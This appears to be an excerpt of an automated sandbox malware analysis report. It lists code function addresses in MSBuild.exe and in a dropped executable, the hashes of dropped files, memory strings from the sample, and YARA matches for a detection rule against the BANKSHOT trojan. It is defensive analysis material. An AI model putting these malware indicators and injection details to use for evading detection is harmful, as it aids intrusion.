Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C584640	1_2_6C584640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56C670	1_2_6C56C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D6E63	1_2_6C5D6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A7E10	1_2_6C5A7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5B5600	1_2_6C5B5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5C9E30	1_2_6C5C9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56BEF0	1_2_6C56BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C57FEF0	1_2_6C57FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D76E3	1_2_6C5D76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C585E90	1_2_6C585E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5CE680	1_2_6C5CE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5C4EA0	1_2_6C5C4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A7710	1_2_6C5A7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C579F00	1_2_6C579F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C596FF0	1_2_6C596FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56DFE0	1_2_6C56DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5B77A0	1_2_6C5B77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C588850	1_2_6C588850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58D850	1_2_6C58D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5AF070	1_2_6C5AF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C577810	1_2_6C577810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5AB820	1_2_6C5AB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5B4820	1_2_6C5B4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D50C7	1_2_6C5D50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58C0E0	1_2_6C58C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A58E0	1_2_6C5A58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5960A0	1_2_6C5960A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C58A940	1_2_6C58A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5BB970	1_2_6C5BB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5DB170	1_2_6C5DB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C57D960	1_2_6C57D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A5190	1_2_6C5A5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5C2990	1_2_6C5C2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C59D9B0	1_2_6C59D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56C9A0	1_2_6C56C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A9A60	1_2_6C5A9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5A8AC0	1_2_6C5A8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C581AF0	1_2_6C581AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5AE2F0	1_2_6C5AE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5DBA90	1_2_6C5DBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C57CAB0	1_2_6C57CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D2AB0	1_2_6C5D2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5622A0	1_2_6C5622A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C594AA0	1_2_6C594AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C565340	1_2_6C565340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C57C370	1_2_6C57C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5AD320	1_2_6C5AD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C5D53C8	1_2_6C5D53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C56F380	1_2_6C56F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C61AC60	1_2_6C61AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6EAC30	1_2_6C6EAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6D6C00	1_2_6C6D6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C60ECC0	1_2_6C60ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C66ECD0	1_2_6C66ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6DED70	1_2_6C6DED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C73AD50	1_2_6C73AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C798D20	1_2_6C798D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C79CDC0	1_2_6C79CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C614DB0	1_2_6C614DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6A6D90	1_2_6C6A6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6AEE70	1_2_6C6AEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6F0E20	1_2_6C6F0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C61AEC0	1_2_6C61AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6B0EC0	1_2_6C6B0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C696E90	1_2_6C696E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6D2F70	1_2_6C6D2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C67EF40	1_2_6C67EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C750F20	1_2_6C750F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C616F10	1_2_6C616F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C610FE0	1_2_6C610FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6EEFF0	1_2_6C6EEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C758FB0	1_2_6C758FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C61EFB0	1_2_6C61EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6E4840	1_2_6C6E4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C660820	1_2_6C660820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C69A820	1_2_6C69A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C7168E0	1_2_6C7168E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C648960	1_2_6C648960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C666900	1_2_6C666900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C72C9E0	1_2_6C72C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6449F0	1_2_6C6449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6A09A0	1_2_6C6A09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6CA9A0	1_2_6C6CA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6D09B0	1_2_6C6D09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C68CA70	1_2_6C68CA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6C8A30	1_2_6C6C8A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6BEA00	1_2_6C6BEA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C68EA80	1_2_6C68EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C716BE0	1_2_6C716BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6B0BA0	1_2_6C6B0BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C628460	1_2_6C628460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C674420	1_2_6C674420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C69A430	1_2_6C69A430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6564D0	1_2_6C6564D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6AA4D0	1_2_6C6AA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C73A480	1_2_6C73A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C672560	1_2_6C672560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6B0570	1_2_6C6B0570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C758550	1_2_6C758550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C668540	1_2_6C668540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C714540	1_2_6C714540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6DA5E0	1_2_6C6DA5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C69E5F0	1_2_6C69E5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6045B0	1_2_6C6045B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C66C650	1_2_6C66C650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C66E6E0	1_2_6C66E6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6AE6E0	1_2_6C6AE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C6346D0	1_2_6C6346D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C690700	1_2_6C690700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_6C63A7D0	1_2_6C63A7D0
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_01828070	5_2_01828070
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0182E960	5_2_0182E960
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_01827858	5_2_01827858
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0182787C	5_2_0182787C
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_01827E28	5_2_01827E28
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0568DD20	5_2_0568DD20
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0568F470	5_2_0568F470
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_0568F218	5_2_0568F218
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FCCF3	5_2_057FCCF3
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FDCC8	5_2_057FDCC8
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057F75E1	5_2_057F75E1
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057F6478	5_2_057F6478
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057F6468	5_2_057F6468
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057F2C38	5_2_057F2C38
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FDCC7	5_2_057FDCC7
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FA958	5_2_057FA958
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FA94A	5_2_057FA94A
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_057FEAE3	5_2_057FEAE3
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_06141B10	5_2_06141B10
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_06143201	5_2_06143201
Source: C:\ProgramData\DBAAFIDGDA.exe	Code function: 5_2_06143036	5_2_06143036
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004190A3	6_2_004190A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_004186DC	6_2_004186DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0041732C	6_2_0041732C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064B4CF0	6_2_064B4CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064B66C0	6_2_064B66C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064AEA80	6_2_064AEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064B9000	6_2_064B9000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064D7810	6_2_064D7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_064AF160	6_2_064AF160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06699390	6_2_06699390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0667AEBE	6_2_0667AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06699F80	6_2_06699F80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06699A20	6_2_06699A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0660A2C0	6_2_0660A2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_066316D0	6_2_066316D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06609430	6_2_06609430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06609CC0	6_2_06609CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0660F8D0	6_2_0660F8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0662FD50	6_2_0662FD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06633920	6_2_06633920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0662D100	6_2_0662D100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_066261E0	6_2_066261E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06519A10	6_2_06519A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_0659E2E0	6_2_0659E2E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06549690	6_2_06549690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06538760	6_2_06538760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06594440	6_2_06594440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06513000	6_2_06513000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_065C8030	6_2_065C8030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06519C20	6_2_06519C20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_065C24C0	6_2_065C24C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06514970	6_2_06514970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06528120	6_2_06528120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06599190	6_2_06599190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06654FB2	6_2_06654FB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 6_2_06635CCF	6_2_06635CCF

Source: Joe Sandbox View	Dropped File: C:\ProgramData\DBAAFIDGDA.exe 9F619F332A9E5BD74A345778E86A871E9EFB087BFEA43ADE7CBF9F63A12151B0
Source: Joe Sandbox View	Dropped File: C:\ProgramData\DGDBKFBAKF.exe 8B020CDE39D33B53F4C48A8C7EA30FB1F7854B13562508C0A1665FFD1397F7FC
Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C79D930 appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C79DAE0 appears 39 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00401E83 appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C639B10 appears 35 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C5A94D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C59CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 00402000 appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C633620 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: String function: 6C7909D0 appears 157 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7280 -s 2980

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003321000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePE.dll& vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000000.1663495902.0000000001020000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamefmradiosoft.exe$ vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1668500090.00000000014CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclrjit.dllT vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1669807678.0000000003431000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.0000000004866000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGPgmshZsn.dll0 vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1679997283.0000000005D53000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameGPgmshZsn.dll0 vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1673284783.00000000043DC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameGPgmshZsn.dll0 vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe, 00000000.00000002.1678671142.0000000005950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePE.dll& vs 1lKbb2hF7fYToopfpmEvlyRN.exe
Source: 1lKbb2hF7fYToopfpmEvlyRN.exe	Binary or memory string: OriginalFilenamefmradiosoft.exe$ vs 1lKbb2hF7fYToopfpmEvlyRN.exe

Source: 1lKbb2hF7fYToopfpmEvlyRN.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 1.2.MSBuild.exe.428038.0.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 1.2.MSBuild.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000001.00000002.2379793431.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: 0.2.1lKbb2hF7fYToopfpmEvlyRN.exe.4651410.12.raw.unpack, DSzeK.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
